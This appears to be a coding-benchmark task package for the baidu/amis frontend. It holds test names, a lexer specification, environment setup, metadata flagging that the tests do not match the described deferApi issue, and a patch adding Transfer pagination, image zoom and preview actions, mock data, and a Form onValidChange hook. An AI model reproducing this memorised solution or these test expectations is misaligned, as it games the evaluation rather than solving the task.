baseElement.querySelector('.cxd-ImageGallery-main img')!; expect(imgIns).toHaveStyle({ - transform: 'scale(1) rotate(0deg)' + transform: 'translate(0px, 0px) scale(1) rotate(0deg)' }); fireEvent.click(actions[1].firstElementChild!); expect(imgIns).toHaveStyle({ - transform: 'scale(1) rotate(90deg)' + transform: 'translate(0px, 0px) scale(1) rotate(90deg)' }); });
[ "evalute:speical characters" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "async-evalute:namespace", "evalute:keywords", "evalute:Math", "evalute:namespace", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Function: lexer(input: string, options: LexerOptions = {}) Location: packages/amis-formula/src/lexer.ts Inputs: - **input** `string` – the raw formula expression to be tokenised. - **options** `LexerOptions` (optional, default `{}`) – configuration object that may contain: - `evalMode` `boolean` – treat the input as an evaluation expression. - `variableMode` `boolean` – treat the input as a variable expression. - `allowFilter` `boolean` – enable the `|` filter operator (default `true`). - `isFilter?: (name: string) => boolean` – callback used to decide whether a name after a `|` token should be interpreted as a filter (when `true`) or as a bitwise operator (when `false`). - `filters?: Record<string, Function>` – optional map of custom filter functions (used only for the callback’s default behaviour). Outputs: Returns an array of `Token` objects representing the lexical tokens of the input. May throw an error on unexpected characters (e.g., “Unexpected token x in 1:17”). Description: Performs lexical analysis for the Amis formula language. The signature was changed to make the `options` argument non‑optional (defaulting to an empty object) and to add the `isFilter` callback, allowing the lexer to distinguish between filter usage (`| filter`) and bitwise‑OR usage (`|` as an operator). This enables tests such as evaluating `${1 | 2}` to be parsed correctly as a bitwise operation rather than a filter.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 30, "num_modified_lines": 1055, "pr_author": "2betop", "pr_labels": [ "feat" ], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [ "https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-95eedf8e35f124d56f35a016c1df591c4070cb9aff56cfefc58b33512de87653R586-R640" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue describes adding a `deferApi` feature for lazy loading nested data in Table/CRUD components. However, the provided test patch touches unrelated parts of the codebase (formula lexer, image gallery transforms, transfer component snapshots, etc.) and introduces new test expectations that are not mentioned in the issue. This indicates a coupling between the feature fix and many unrelated tests, suggesting the problem is not a clean, self‑contained task but an environment‑setup issue. Therefore the primary classification is B1 (test suite coupling).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests for amis‑formula lexer now expect filter detection logic not described in the issue.", "Image gallery snapshot expects transform changes (translate) unrelated to Table feature.", "Transfer component snapshots have altered tooltip attributes unrelated to Table feature.", "Various UI component snapshots and styles are modified without mention in the issue." ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
8af076ce0ef89d5993c9f80ad2b54387c83392ec
2023-11-06 06:13:18
github-actions[bot]: <!-- Labeler (https://github.com/jimschubert/labeler) --> 👍 Thanks for this! 🏷 I have applied any labels matching special text in your issue. Please review the labels and make any necessary changes. lurunze1226: 补充: - `showTableAddBtn` - `showFooterAddBtn` - `toolbarClassName`
baidu__amis-8629
diff --git a/docs/zh-CN/components/form/transfer.md b/docs/zh-CN/components/form/transfer.md index c2c05e5f3..dfaa00e19 100644 --- a/docs/zh-CN/components/form/transfer.md +++ b/docs/zh-CN/components/form/transfer.md @@ -878,12 +878,95 @@ icon: } ``` +## 分页 + +> `3.6.0`及以上版本 + +当数据量庞大时,可以开启数据源分页,此时左侧列表底部会出现分页控件,相关配置参考属性表。通常在提交表单中使用分页场景,处理数据量较大的数据源。如果需要在表单中回显已选值,建议同时设置`{"joinValues": false, "extractValue": false}`,因为已选数据可能位于不同的分页,如果仅使用value值作为提交值,可能会导致右侧结果区无法正确渲染。 + +> 仅列表(list)和表格(table)展示模式支持分页,接口的数据结构参考[CRUD数据源接口格式](../crud#数据结构) + +```schema: scope="body" +{ + "type": "form", + "debug": true, + "body": [ + { + "label": "默认", + "type": "transfer", + "name": "transfer", + "joinValues": false, + "extractValue": false, + "source": "/api/mock2/options/transfer?page=${page}&perPage=${perPage}", + "pagination": { + "enable": true, + "layout": ["pager", "perpage", "total"], + "popOverContainerSelector": ".cxd-Panel--form" + }, + "value": [ + {"label": "Laura Lewis", "value": "1", "id": 1}, + {"label": "Christopher Rodriguez", "value": "3", "id": 3}, + {"label": "Laura Miller", "value": "12", "id": 12}, + {"label": "Patricia Robinson", "value": "14", "id": 14} + ] + } + ] +} +``` + +### 前端分页 + +> `3.6.0`及以上版本 + +当使用数据域变量作为数据源时,支持实现前端一次性加载并分页 + +```schema: scope="body" +{ + "type": "form", + "debug": true, + "body": [ + { + "type": "service", + "api": { + "url": "/api/mock2/options/loadDataOnce", + "method": "get", + "responseData": { + "transferOptions": "${items}" + } + }, + "body": [ + { + "label": "默认", + "type": "transfer", + "name": "transfer", + "joinValues": false, + "extractValue": false, + "source": "${transferOptions}", + "pagination": { + "enable": true, + "layout": ["pager", "perpage", "total"], + "popOverContainerSelector": ".cxd-Panel--form" + }, + "value": [ + {"label": "Laura Lewis", "value": "1", "id": 1}, + {"label": "Christopher Rodriguez", "value": "3", "id": 3}, + {"label": "Laura Miller", "value": "12", "id": 12}, + {"label": "Patricia Robinson", "value": "14", "id": 14} + ] + } + ] + } + ] +} +``` + + ## 属性表 除了支持 [普通表单项属性表](./formitem#%E5%B1%9E%E6%80%A7%E8%A1%A8) 中的配置以外,还支持下面一些配置 -| 属性名 | 类型 | 默认值 | 说明 | -| -------------------------- | ----------------------------------------------------- | ------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| 属性名 | 类型 | 默认值 | 说明 | 版本 | +| -------------------------- | ----------------------------------------------------- | ------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --- | | options | `Array<object>`或`Array<string>` | | [选项组](./options#%E9%9D%99%E6%80%81%E9%80%89%E9%A1%B9%E7%BB%84-options) | | source | `string`或 [API](../../../docs/types/api) | | [动态选项组](./options#%E5%8A%A8%E6%80%81%E9%80%89%E9%A1%B9%E7%BB%84-source) | | delimeter | `string` | `false` | [拼接符](./options#%E6%8B%BC%E6%8E%A5%E7%AC%A6-delimiter) | @@ -909,6 +992,13 @@ icon: | valueTpl | `string` \| [SchemaNode](../../docs/types/schemanode) | | 用来自定义值的展示 | | itemHeight | `number` | `32` | 每个选项的高度,用于虚拟渲染 | | virtualThreshold | `number` | `100` | 在选项数量超过多少时开启虚拟渲染 | +| pagination | `object` | | 分页配置 | `3.6.0` | +| pagination.className | `string` | | 分页控件CSS类名 | `3.6.0` | +| pagination.enable | `boolean` | | 是否开启分页 | `3.6.0` | +| pagination.layout | `string` \| `string[]` | `["pager"]` | 通过控制 layout 属性的顺序,调整分页结构布局 | `3.6.0` | +| pagination.perPageAvailable | `number[]` | `[10, 20, 50, 100]` | 指定每页可以显示多少条 | `3.6.0` | +| pagination.maxButtons | `number` | `5` | 最多显示多少个分页按钮,最小为 5 | `3.6.0` | +| pagination.popOverContainerSelector | `string` | | 切换每页条数的控件挂载点 | `3.6.0` | ## 事件表 diff --git a/docs/zh-CN/components/image.md b/docs/zh-CN/components/image.md index 52b722469..98e0a8c55 100755 --- a/docs/zh-CN/components/image.md +++ b/docs/zh-CN/components/image.md @@ -433,31 +433,33 @@ List 的内容、Card 卡片的内容配置同上 ## 属性表 -| 属性名 | 类型 | 默认值 | 说明 | 版本 | -| ------------------ | ------------------------------------ | --------- | --------------------------------------------------------------------------------------------- | ------- | -| type | `string` | | 如果在 Table、Card 和 List 中,为`"image"`;在 Form 中用作静态展示,为`"static-image"` | -| className | `string` | | 外层 CSS 类名 | -| innerClassName | `string` | | 组件内层 CSS 类名 | -| imageClassName | `string` | | 图片 CSS 类名 | -| thumbClassName | `string` | | 图片缩率图 CSS 类名 | -| height | `string` | | 图片缩率高度 | -| width | `string` | | 图片缩率宽度 | -| title | `string` | | 标题 | -| imageCaption | `string` | | 描述 | -| placeholder | `string` | | 占位文本 | -| defaultImage | `string` | | 无数据时显示的图片 | -| src | `string` | | 缩略图地址 | -| href | [模板](../../docs/concepts/template) | | 外部链接地址 | -| originalSrc | `string` | | 原图地址 | -| enlargeAble | `boolean` | | 支持放大预览 | -| enlargeTitle | `string` | | 放大预览的标题 | -| enlargeCaption | `string` | | 放大预览的描述 | -| enlargeWithGallary | `string` | `true` | 在表格中,图片的放大功能会默认展示所有图片信息,设置为`false`将关闭放大模式下图片集列表的展示 | -| thumbMode | `string` | `contain` | 预览图模式,可选:`'w-full'`, `'h-full'`, `'contain'`, `'cover'` | -| thumbRatio | `string` | `1:1` | 预览图比例,可选:`'1:1'`, `'4:3'`, `'16:9'` | -| imageMode | `string` | `thumb` | 图片展示模式,可选:`'thumb'`, `'original'` 即:缩略图模式 或者 原图模式 | -| showToolbar | `boolean` | `false` | 放大模式下是否展示图片的工具栏 | `2.2.0` | -| toolbarActions | `ImageAction[]` | | 图片工具栏,支持旋转,缩放,默认操作全部开启 | `2.2.0` | +| 属性名 | 类型 | 默认值 | 说明 | 版本 | +| ------------------ | ------------------------------------------------ | --------- | --------------------------------------------------------------------------------------------- | ------- | +| type | `string` | | 如果在 Table、Card 和 List 中,为`"image"`;在 Form 中用作静态展示,为`"static-image"` | +| className | `string` | | 外层 CSS 类名 | +| innerClassName | `string` | | 组件内层 CSS 类名 | +| imageClassName | `string` | | 图片 CSS 类名 | +| thumbClassName | `string` | | 图片缩率图 CSS 类名 | +| height | `string` | | 图片缩率高度 | +| width | `string` | | 图片缩率宽度 | +| title | `string` | | 标题 | +| imageCaption | `string` | | 描述 | +| placeholder | `string` | | 占位文本 | +| defaultImage | `string` | | 无数据时显示的图片 | +| src | `string` | | 缩略图地址 | +| href | [模板](../../docs/concepts/template) | | 外部链接地址 | +| originalSrc | `string` | | 原图地址 | +| enlargeAble | `boolean` | | 支持放大预览 | +| enlargeTitle | `string` | | 放大预览的标题 | +| enlargeCaption | `string` | | 放大预览的描述 | +| enlargeWithGallary | `string` | `true` | 在表格中,图片的放大功能会默认展示所有图片信息,设置为`false`将关闭放大模式下图片集列表的展示 | +| thumbMode | `string` | `contain` | 预览图模式,可选:`'w-full'`, `'h-full'`, `'contain'`, `'cover'` | +| thumbRatio | `string` | `1:1` | 预览图比例,可选:`'1:1'`, `'4:3'`, `'16:9'` | +| imageMode | `string` | `thumb` | 图片展示模式,可选:`'thumb'`, `'original'` 即:缩略图模式 或者 原图模式 | +| showToolbar | `boolean` | `false` | 放大模式下是否展示图片的工具栏 | `2.2.0` | +| toolbarActions | `ImageAction[]` | | 图片工具栏,支持旋转,缩放,默认操作全部开启 | `2.2.0` | +| maxScale | `number` 或 [模板](../../docs/concepts/template) | | 执行调整图片比例动作时的最大百分比 | `3.4.4` | +| minScale | `number` 或 [模板](../../docs/concepts/template) | | 执行调整图片比例动作时的最小百分比 | `3.4.4` | #### ImageAction @@ -475,3 +477,170 @@ interface ImageAction { disabled?: boolean; } ``` + +## 事件表 + +当前组件会对外派发以下事件,可以通过`onEvent`来监听这些事件,并通过`actions`来配置执行的动作,在`actions`中可以通过`${事件参数名}`或`${event.data.[事件参数名]}`来获取事件产生的数据,详细查看[事件动作](../../docs/concepts/event-action)。 + +| 事件名称 | 事件参数 | 说明 | +| ---------- | ---------- | -------------- | +| click | 上下文数据 | 点击图片时触发 | +| mouseenter | 上下文数据 | 鼠标移入时触发 | +| mouseleave | 上下文数据 | 鼠标移入时触发 | + +### click / mouseenter / mouseleave + +点击图片 / 鼠标移入图片 / 鼠标移出图片,可以尝试通过${event.context.nativeEvent}获取鼠标事件对象。 + +```schema: scope="body" +{ + "type": "image", + "src": "https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80", + "onEvent": { + "click": { + "actions": [ + { + "actionType": "toast", + "args": { + "msg": "图片被点击了" + } + } + ] + }, + "mouseenter": { + "actions": [ + { + "actionType": "toast", + "args": { + "msg": "鼠标移入图片" + } + } + ] + }, + "mouseleave": { + "actions": [ + { + "actionType": "toast", + "args": { + "msg": "鼠标移出图片" + } + } + ] + } + } +} +``` + +## 动作表 + +当前组件对外暴露以下特性动作,其他组件可以通过指定`actionType: 动作名称`、`componentId: 该组件id`来触发这些动作,动作配置可以通过`args: {动作配置项名称: xxx}`来配置具体的参数,详细请查看[事件动作](../../docs/concepts/event-action#触发其他组件的动作)。 + +| 动作名称 | 动作配置 | 说明 | +| -------- | ------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------ | +| preview | - | 预览图片 | +| zoom | `scale: number` 或 `scale: `[模板](../../docs/concepts/template),定义每次放大或缩小图片的百分比大小,正值为放大,负值为缩小,默认 50 | 调整图片比例,将图片等比例放大或缩小 | + +### preview + +预览图片,可以通过配置`originalSrc`来指定预览的原图地址。 + +```schema: scope="body" +{ + "type": "page", + "body": { + "type": "container", + "body": [ + { + "type": "container", + "body": [ + { + "type": "image", + "className": "mb-1", + "src": "https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80", + "originalSrc": "https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg", + "id": "previewImage" + } + ] + }, + { + "type": "action", + "label": "预览图片", + "onEvent": { + "click": { + "actions": [ + { + "actionType": "preview", + "componentId": "previewImage" + } + ] + } + } + } + ] + } +} +``` + +### zoom + +调整图片比例,将图片等比例放大或缩小。可以通过配置图片的`maxScale`和`minScale`来限制调整的比例。 + +```schema: scope="body" +{ + "type": "page", + "body": { + "type": "container", + "body": [ + { + "type": "flex", + "items": [ + { + "type": "image", + "innerClassName": "no-border", + "className": "mt-5 mb-5", + "src": "https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80", + "maxScale": 200, + "minScale": 20, + "id": "zoomImage" + } + ] + }, + { + "type": "action", + "label": "放大图片", + "onEvent": { + "click": { + "actions": [ + { + "actionType": "zoom", + "args": { + "scale": 50, + }, + "componentId": "zoomImage" + } + ] + } + } + }, + { + "type": "action", + "label": "缩小图片", + "className": "mx-1", + "onEvent": { + "click": { + "actions": [ + { + "actionType": "zoom", + "args": { + "scale": -50, + }, + "componentId": "zoomImage" + } + ] + } + } + } + ] + } +} +``` diff --git a/docs/zh-CN/concepts/event-action.md b/docs/zh-CN/concepts/event-action.md index d8538fd51..58bce45a3 100644 --- a/docs/zh-CN/concepts/event-action.md +++ b/docs/zh-CN/concepts/event-action.md @@ -75,42 +75,42 @@ order: 9 ```schema { - type: 'page', - body: [ + "type": "page", + "body": [ { - type: 'button', - label: '尝试点击、鼠标移入/移出', - level: 'primary', - onEvent: { - click: { - actions: [ + "type": "button", + "label": "尝试点击、鼠标移入/移出", + "level": "primary", + "onEvent": { + "click": { + "actions": [ { - actionType: 'toast', - args: { - msgType: 'info', - msg: '派发点击事件' + "actionType": "toast", + "args": { + "msgType": "info", + "msg": "派发点击事件" } } ] }, - mouseenter: { - actions: [ + "mouseenter": { + "actions": [ { - actionType: 'toast', - args: { - msgType: 'info', - msg: '派发鼠标移入事件' + "actionType": "toast", + "args": { + "msgType": "info", + "msg": "派发鼠标移入事件" } } ] }, - mouseleave: { - actions: [ + "mouseleave": { + "actions": [ { - actionType: 'toast', - args: { - msgType: 'info', - msg: '派发鼠标移出事件' + "actionType": "toast", + "args": { + "msgType": "info", + "msg": "派发鼠标移出事件" } } ] diff --git a/mock/cfc/mock/options/loadDataOnce.js b/mock/cfc/mock/options/loadDataOnce.js new file mode 100644 index 000000000..f0c991201 --- /dev/null +++ b/mock/cfc/mock/options/loadDataOnce.js @@ -0,0 +1,238 @@ +/** 前端分页的接口 */ +module.exports = function (req, res) { + res.json({ + status: 0, + msg: 'ok', + data: { + count: data.length, + items: data + } + }); +}; + +const data = [ + { + "label": "Laura Lewis", + "value": "1" + }, + { + "label": "David Gonzalez", + "value": "2" + }, + { + "label": "Christopher Rodriguez", + "value": "3" + }, + { + "label": "Sarah Young", + "value": "4" + }, + { + "label": "James Jones", + "value": "5" + }, + { + "label": "Larry Robinson", + "value": "6" + }, + { + "label": "Christopher Perez", + "value": "7" + }, + { + "label": "Sharon Davis", + "value": "8" + }, + { + "label": "Kenneth Anderson", + "value": "9" + }, + { + "label": "Deborah Lewis", + "value": "10" + }, + { + "label": "Jennifer Lewis", + "value": "11" + }, + { + "label": "Laura Miller", + "value": "12" + }, + { + "label": "Larry Harris", + "value": "13" + }, + { + "label": "Patricia Robinson", + "value": "14" + }, + { + "label": "Mark Davis", + "value": "15" + }, + { + "label": "Jessica Harris", + "value": "16" + }, + { + "label": "Anna Brown", + "value": "17" + }, + { + "label": "Lisa Young", + "value": "18" + }, + { + "label": "Donna Williams", + "value": "19" + }, + { + "label": "Shirley Davis", + "value": "20" + }, + { + "label": "Richard Clark", + "value": "21" + }, + { + "label": "Cynthia Martinez", + "value": "22" + }, + { + "label": "Kimberly Walker", + "value": "23" + }, + { + "label": "Timothy Anderson", + "value": "24" + }, + { + "label": "Betty Lee", + "value": "25" + }, + { + "label": "Jeffrey Allen", + "value": "26" + }, + { + "label": "Karen Martinez", + "value": "27" + }, + { + "label": "Anna Lopez", + "value": "28" + }, + { + "label": "Dorothy Anderson", + "value": "29" + }, + { + "label": "David Perez", + "value": "30" + }, + { + "label": "Dorothy Martin", + "value": "31" + }, + { + "label": "George Johnson", + "value": "32" + }, + { + "label": "Donald Jackson", + "value": "33" + }, + { + "label": "Mary Brown", + "value": "34" + }, + { + "label": "Deborah Martinez", + "value": "35" + }, + { + "label": "Donald Jackson", + "value": "36" + }, + { + "label": "Lisa Robinson", + "value": "37" + }, + { + "label": "Laura Martinez", + "value": "38" + }, + { + "label": "Timothy Taylor", + "value": "39" + }, + { + "label": "Joseph Martinez", + "value": "40" + }, + { + "label": "Karen Wilson", + "value": "41" + }, + { + "label": "Karen Walker", + "value": "42" + }, + { + "label": "William Martinez", + "value": "43" + }, + { + "label": "Linda Brown", + "value": "44" + }, + { + "label": "Elizabeth Brown", + "value": "45" + }, + { + "label": "Anna Moore", + "value": "46" + }, + { + "label": "Robert Martinez", + "value": "47" + }, + { + "label": "Edward Hernandez", + "value": "48" + }, + { + "label": "Elizabeth Hall", + "value": "49" + }, + { + "label": "Linda Jackson", + "value": "50" + }, + { + "label": "Brian Jones", + "value": "51" + }, + { + "label": "Amy Thompson", + "value": "52" + }, + { + "label": "Kimberly Wilson", + "value": "53" + }, + { + "label": "Nancy Garcia", + "value": "54" + }, + { + "label": "Mary Thompson", + "value": "55" + } +].map(function (item, index) { + return Object.assign({}, item, { + id: index + 1 + }); +}); diff --git a/mock/cfc/mock/options/transfer.js b/mock/cfc/mock/options/transfer.js new file mode 100644 index 000000000..da3cf3e40 --- /dev/null +++ b/mock/cfc/mock/options/transfer.js @@ -0,0 +1,242 @@ +/** Transfer分页接口 */ +module.exports = function (req, res) { + const perPage = Number(req.query.perPage || 10); + const page = Number(req.query.page || 1); + + res.json({ + status: 0, + msg: 'ok', + data: { + count: data.length, + page: page, + items: data.concat().splice((page - 1) * perPage, perPage) + } + }); +}; + +const data = [ + { + "label": "Laura Lewis", + "value": "1" + }, + { + "label": "David Gonzalez", + "value": "2" + }, + { + "label": "Christopher Rodriguez", + "value": "3" + }, + { + "label": "Sarah Young", + "value": "4" + }, + { + "label": "James Jones", + "value": "5" + }, + { + "label": "Larry Robinson", + "value": "6" + }, + { + "label": "Christopher Perez", + "value": "7" + }, + { + "label": "Sharon Davis", + "value": "8" + }, + { + "label": "Kenneth Anderson", + "value": "9" + }, + { + "label": "Deborah Lewis", + "value": "10" + }, + { + "label": "Jennifer Lewis", + "value": "11" + }, + { + "label": "Laura Miller", + "value": "12" + }, + { + "label": "Larry Harris", + "value": "13" + }, + { + "label": "Patricia Robinson", + "value": "14" + }, + { + "label": "Mark Davis", + "value": "15" + }, + { + "label": "Jessica Harris", + "value": "16" + }, + { + "label": "Anna Brown", + "value": "17" + }, + { + "label": "Lisa Young", + "value": "18" + }, + { + "label": "Donna Williams", + "value": "19" + }, + { + "label": "Shirley Davis", + "value": "20" + }, + { + "label": "Richard Clark", + "value": "21" + }, + { + "label": "Cynthia Martinez", + "value": "22" + }, + { + "label": "Kimberly Walker", + "value": "23" + }, + { + "label": "Timothy Anderson", + "value": "24" + }, + { + "label": "Betty Lee", + "value": "25" + }, + { + "label": "Jeffrey Allen", + "value": "26" + }, + { + "label": "Karen Martinez", + "value": "27" + }, + { + "label": "Anna Lopez", + "value": "28" + }, + { + "label": "Dorothy Anderson", + "value": "29" + }, + { + "label": "David Perez", + "value": "30" + }, + { + "label": "Dorothy Martin", + "value": "31" + }, + { + "label": "George Johnson", + "value": "32" + }, + { + "label": "Donald Jackson", + "value": "33" + }, + { + "label": "Mary Brown", + "value": "34" + }, + { + "label": "Deborah Martinez", + "value": "35" + }, + { + "label": "Donald Jackson", + "value": "36" + }, + { + "label": "Lisa Robinson", + "value": "37" + }, + { + "label": "Laura Martinez", + "value": "38" + }, + { + "label": "Timothy Taylor", + "value": "39" + }, + { + "label": "Joseph Martinez", + "value": "40" + }, + { + "label": "Karen Wilson", + "value": "41" + }, + { + "label": "Karen Walker", + "value": "42" + }, + { + "label": "William Martinez", + "value": "43" + }, + { + "label": "Linda Brown", + "value": "44" + }, + { + "label": "Elizabeth Brown", + "value": "45" + }, + { + "label": "Anna Moore", + "value": "46" + }, + { + "label": "Robert Martinez", + "value": "47" + }, + { + "label": "Edward Hernandez", + "value": "48" + }, + { + "label": "Elizabeth Hall", + "value": "49" + }, + { + "label": "Linda Jackson", + "value": "50" + }, + { + "label": "Brian Jones", + "value": "51" + }, + { + "label": "Amy Thompson", + "value": "52" + }, + { + "label": "Kimberly Wilson", + "value": "53" + }, + { + "label": "Nancy Garcia", + "value": "54" + }, + { + "label": "Mary Thompson", + "value": "55" + } +].map(function (item, index) { + return Object.assign({}, item, { + id: index + 1 + }); +}); diff --git a/packages/amis-core/src/actions/CmptAction.ts b/packages/amis-core/src/actions/CmptAction.ts index 92877ab42..6e526e5a4 100644 --- a/packages/amis-core/src/actions/CmptAction.ts +++ b/packages/amis-core/src/actions/CmptAction.ts @@ -36,6 +36,19 @@ export class CmptAction implements RendererAction { */ const key = action.componentId || action.componentName; const dataMergeMode = action.dataMergeMode || 'merge'; + const path = action.args?.path; + + /** 如果args中携带path参数, 则认为是全局变量赋值, 否则认为是组件变量赋值 */ + if (action.actionType === 'setValue' && path && typeof path === 'string') { + const beforeSetData = renderer?.props?.env?.beforeSetData; + if (beforeSetData && typeof beforeSetData === 'function') { + const res = await beforeSetData(renderer, action, event); + + if (res === false) { + return; + } + } + } if (!key) { console.warn('请提供目标组件的componentId或componentName'); @@ -59,23 +72,6 @@ export class CmptAction implements RendererAction { } if (action.actionType === 'setValue') { - const beforeSetData = renderer?.props?.env?.beforeSetData; - const path = action.args?.path; - - /** 如果args中携带path参数, 则认为是全局变量赋值, 否则认为是组件变量赋值 */ - if ( - path && - typeof path === 'string' && - beforeSetData && - typeof beforeSetData === 'function' - ) { - const res = await beforeSetData(renderer, action, event); - - if (res === false) { - return; - } - } - if (component?.setData) { return component?.setData( action.args?.value, diff --git a/packages/amis-core/src/renderers/Form.tsx b/packages/amis-core/src/renderers/Form.tsx index 3b27ded2a..82b8e417b 100644 --- a/packages/amis-core/src/renderers/Form.tsx +++ b/packages/amis-core/src/renderers/Form.tsx @@ -50,6 +50,7 @@ import {isAlive} from 'mobx-state-tree'; import type {LabelAlign} from './Item'; import {injectObjectChain} from '../utils'; +import {reaction} from 'mobx'; export interface FormHorizontal { left?: number; @@ -371,6 +372,7 @@ export interface FormProps onFailed?: (reason: string, errors: any) => any; onFinished: (values: object, action: any) => any; onValidate: (values: object, form: any) => any; + onValidChange?: (valid: boolean, props: any) => void; // 表单数据合法性变更 messages: { fetchSuccess?: string; fetchFailed?: string; @@ -443,6 +445,8 @@ export default class Form extends React.Component<FormProps, object> { 'onChange', 'onFailed', 'onFinished', + 'onValidate', + 'onValidChange', 'onSaved', 'canAccessSuperData', 'lazyChange', @@ -460,8 +464,7 @@ export default class Form extends React.Component<FormProps, object> { [propName: string]: Array<() => Promise<any>>; } = {}; asyncCancel: () => void; - disposeOnValidate: () => void; - disposeRulesValidate: () => void; + toDispose: Array<() => void> = []; shouldLoadInitApi: boolean = false; timer: ReturnType<typeof setTimeout>; mounted: boolean; @@ -532,6 +535,7 @@ export default class Form extends React.Component<FormProps, object> { store, messages: {fetchSuccess, fetchFailed}, onValidate, + onValidChange, promptPageLeave, env, rules @@ -541,49 +545,63 @@ export default class Form extends React.Component<FormProps, object> { if (onValidate) { const finalValidate = promisify(onValidate); - this.disposeOnValidate = this.addHook(async () => { - const result = await finalValidate(store.data, store); + this.toDispose.push( + this.addHook(async () => { + const result = await finalValidate(store.data, store); + + if (result && isObject(result)) { + Object.keys(result).forEach(key => { + let msg = result[key]; + const items = store.getItemsByPath(key); + + // 没有找到 + if (!Array.isArray(items) || !items.length) { + return; + } - if (result && isObject(result)) { - Object.keys(result).forEach(key => { - let msg = result[key]; - const items = store.getItemsByPath(key); + // 在setError之前,提前把残留的error信息清除掉,否则每次onValidate后都会一直把报错 append 上去 + items.forEach(item => item.clearError()); - // 没有找到 - if (!Array.isArray(items) || !items.length) { - return; - } - - // 在setError之前,提前把残留的error信息清除掉,否则每次onValidate后都会一直把报错 append 上去 - items.forEach(item => item.clearError()); + if (msg) { + msg = Array.isArray(msg) ? msg : [msg]; + items.forEach(item => item.addError(msg)); + } - if (msg) { - msg = Array.isArray(msg) ? msg : [msg]; - items.forEach(item => item.addError(msg)); - } + delete result[key]; + }); - delete result[key]; - }); + isEmpty(result) + ? store.clearRestError() + : store.setRestError(Object.keys(result).map(key => result[key])); + } + }) + ); + } - isEmpty(result) - ? store.clearRestError() - : store.setRestError(Object.keys(result).map(key => result[key])); - } - }); + // 表单校验结果发生变化时,触发 onValidChange + if (onValidChange) { + this.toDispose.push( + reaction( + () => store.valid, + valid => onValidChange(valid, this.props) + ) + ); } if (Array.isArray(rules) && rules.length) { - this.disposeRulesValidate = this.addHook(() => { - if (!store.valid) { - return; - } + this.toDispose.push( + this.addHook(() => { + if (!store.valid) { + return; + } - rules.forEach( - item => - !evalExpression(item.rule, store.data) && - store.addRestError(item.message, item.name) - ); - }); + rules.forEach( + item => + !evalExpression(item.rule, store.data) && + store.addRestError(item.message, item.name) + ); + }) + ); } if (isEffectiveApi(initApi, store.data, initFetch, initFetchOn)) { @@ -655,8 +673,8 @@ export default class Form extends React.Component<FormProps, object> { // this.lazyHandleChange.flush(); this.lazyEmitChange.cancel(); this.asyncCancel && this.asyncCancel(); - this.disposeOnValidate && this.disposeOnValidate(); - this.disposeRulesValidate && this.disposeRulesValidate(); + this.toDispose.forEach(fn => fn()); + this.toDispose = []; window.removeEventListener('beforeunload', this.beforePageUnload); this.unBlockRouting?.(); } @@ -836,30 +854,27 @@ export default class Form extends React.Component<FormProps, object> { return this.props.store.validated; } - validate( + async validate( forceValidate?: boolean, - throwErrors: boolean = false + throwErrors: boolean = false, + toastErrors: boolean = true ): Promise<boolean> { const {store, dispatchEvent, data, messages, translate: __} = this.props; this.flush(); - return store - .validate( - this.hooks['validate'] || [], - forceValidate, - throwErrors, - typeof messages?.validateFailed === 'string' - ? __(filter(messages.validateFailed, store.data)) - : undefined - ) - .then((result: boolean) => { - if (result) { - dispatchEvent('validateSucc', data); - } else { - dispatchEvent('validateError', data); - } - return result; - }); + const result = await store.validate( + this.hooks['validate'] || [], + forceValidate, + throwErrors, + toastErrors === false + ? '' + : typeof messages?.validateFailed 